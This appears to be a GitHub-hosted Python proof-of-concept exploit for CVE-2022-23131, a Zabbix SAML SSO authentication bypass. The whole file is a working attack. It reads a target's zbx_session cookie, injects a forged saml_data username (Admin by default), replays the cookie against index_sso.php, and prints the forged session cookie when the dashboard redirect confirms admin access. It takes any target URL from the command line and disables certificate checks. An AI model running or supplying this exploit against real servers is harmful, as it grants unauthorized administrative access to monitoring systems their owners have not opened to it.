-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2022-23131.py
74 lines (65 loc) · 2.63 KB
/
CVE-2022-23131.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
# -*- coding: utf-8 -*-
# @Author : AD钙奶
import base64
import json
import re
import ssl
import sys
import urllib.parse
import argparse
import requests
try:
requests.packages.urllib3.disable_warnings()
_create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
pass
else:
ssl._create_default_https_context = _create_unverified_https_context
def exp(target, username):
try:
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
}
resp = requests.get(url=target, headers=headers, verify=False)
cookie = resp.headers.get("Set-Cookie")
zbx_session = re.findall(r"zbx_session=(.*?); ", cookie)
url_decode_data = urllib.parse.unquote(zbx_session[0], encoding='utf-8')
base64_decode_data = base64.b64decode(url_decode_data)
decode_to_str = str(base64_decode_data, encoding='utf-8')
to_json = json.loads(decode_to_str)
tmp_ojb = dict(saml_data=dict(username_attribute=username), sessionid=to_json["sessionid"], sign=to_json["sign"])
payloadJson = json.dumps(tmp_ojb)
payload = urllib.parse.quote(base64.b64encode(payloadJson.encode()))
_verify(target, payload)
except Exception as e:
# print(e)
pass
def _verify(url, payload):
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
"Cache-Control": "max-age=0",
"Connection": "close",
"Cookie": f"zbx_session={payload}",
}
url = f'{url}/index_sso.php'
reqs = requests.get(url, headers=headers, allow_redirects=False)
if reqs.status_code == 302:
if reqs.headers['location'] == 'zabbix.php?action=dashboard.view':
print(f"[ * ] 存在CVE-2022-23131漏洞 {url}" + '\n' + "zbx_session:", payload)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="输入目标地址; Example:http://ip:port")
parser.add_argument("-a", "--username", default='Admin', help="输入zabbix的用户名,默认为Admin")
args = parser.parse_args()
if args.url is not None:
url = args.url
username = args.username
exp(url, username)
if __name__ == '__main__':
main()